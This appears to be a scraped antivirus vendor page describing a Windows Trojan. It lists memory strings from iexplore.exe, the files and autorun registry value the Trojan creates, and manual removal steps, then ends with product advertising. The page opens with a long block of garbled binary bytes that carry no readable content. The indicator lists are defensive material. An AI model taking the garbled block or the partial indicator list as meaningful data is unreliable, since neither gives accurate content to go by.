.}L....HF~=9....g....'....7n......y..7.%..^..)>>>..P...Z.r..9
.......x.4....v....r....b,[email protected]*>._................_.v.mv_..GGr8^..
..cE..D........i.B >>~piEU.w..i..r...Ak....E.d..._)mq).M..PVA5..
.,m!p....RSe7v.......lo.M...mX>...l..{.....V9.Ptj....;.h"..9.......
%{s.l...wd......O..r...(.e....b...T.....B.'..1._...O.....u..L....7h...
h...Z.`.}.U.}.....J....{)....xy....{.i..dz.C$-.x1.X..&.XD...!....b.1Y.
.D........)........\...?..P.n.IK.si..L..9.L...i.k..=k.x.E..(. ...W....
..m.....u&K/....MV.S..]...1..9.G...pw..,#...5$''6.DW....#....Qr:0.\...
o.5..|.>D .d1)q...QWB~<w..J..C&.../ .../t..e....S.~^Q.O.>...w
. W..d.....G........].)......h..=...0..Pn...K.../....y>5I..$.?1..-.
*..).vmm..;wd.o.n...........$..7..<R.....M..]....&5..O...T__...f.m.
.*.bK...)...D.#a.....S(k.D._dI.~^t.IX..*.;..r.3.;..2.F.....=nX...1.P..
@..m.:.&.L.@E;.P..l.....7.h.W.=Y.R..R..-.8U.......if.....N....`...3..f
@y......?2...t(n.RJ.....kt.D.......(...N...._\Bx...?|K..&.m4.R..X.o)-=
... (...i..1V!0c.,s.).....R./([email protected].....*LJ..ic..L..2.3.
..8*,)...B9. .....!..JKK.......%.A..RM..2,.A...H....|.T... ....r..
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







iexplore.exe_516:




%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1524
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Cookies\Current_User@craigslist[2].txt (334 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\respond-fork.min[1].js (328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cl[1].css (2523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-ui-clcustom[1].css (338 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\sprite-16px[1].png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepage[1].css (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\json2.min[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage[1].css (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jquery-ui-clcustom[1].css (1390 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage-concat.min[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ukraine.craigslist[1].htm (1117 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\localstorage[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\cl[1].css (276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\html5shiv.min[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\general-concat.min[1].js (15737 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\localstorage[1].html (508 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe (7800 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "devencl.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now